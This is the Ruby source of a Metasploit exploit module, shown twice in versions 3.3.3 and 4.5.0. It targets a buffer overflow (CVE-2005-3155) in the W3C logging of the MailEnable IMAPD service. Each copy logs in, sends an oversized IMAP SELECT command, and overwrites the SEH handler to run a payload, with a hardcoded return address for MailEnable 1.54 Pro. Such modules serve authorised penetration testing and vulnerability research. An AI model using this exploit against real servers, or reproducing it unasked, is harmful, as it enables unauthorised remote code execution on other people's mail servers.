==> metasploit-3.3.3.tbz: share/metasploit/modules/exploits/windows/imap/mailenable_w3c_select.rb <==
##
# $Id: mailenable_w3c_select.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Imap
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'MailEnable IMAPD W3C Logging Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the W3C logging
				functionality of the MailEnable IMAPD service. Logging is
				not enabled by default and this exploit requires a valid
				username and password to exploit the flaw. MailEnable
				Professional version 1.6 and prior and MailEnable Enterprise
				version 1.1 and prior are affected.
					
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
				    	[ 'CVE', '2005-3155'],
					[ 'OSVDB', '19842'],
					[ 'BID', '15006'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},			
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL
				],
			'DisclosureDate' => '',
			'DefaultTarget' => 0))
	end
	
	def check
		connect
		disconnect
		
		if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect_login
		
		buf = rand_text_alphanumeric(6196, payload_badchars) 
		seh = generate_seh_payload(target.ret)
		req = 'a01 SELECT ' + buf + seh + "\r\n"
		sock.put(req)
		
		handler
		disconnect
	end

end

==> metasploit-4.5.0.tbz: share/metasploit/modules/exploits/windows/imap/mailenable_w3c_select.rb <==
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Imap
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MailEnable IMAPD W3C Logging Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the W3C logging
				functionality of the MailEnable IMAPD service. Logging is
				not enabled by default and this exploit requires a valid
				username and password to exploit the flaw. MailEnable
				Professional version 1.6 and prior and MailEnable Enterprise
				version 1.1 and prior are affected.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-3155'],
					[ 'OSVDB', '19842'],
					[ 'BID', '15006'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL
				],
			'DisclosureDate' => 'Oct 03 2005',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect

		if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		buf = rand_text_alphanumeric(6196, payload_badchars)
		seh = generate_seh_payload(target.ret)
		req = 'a01 SELECT ' + buf + seh + "\r\n"
		sock.put(req)

		handler
		disconnect
	end

end
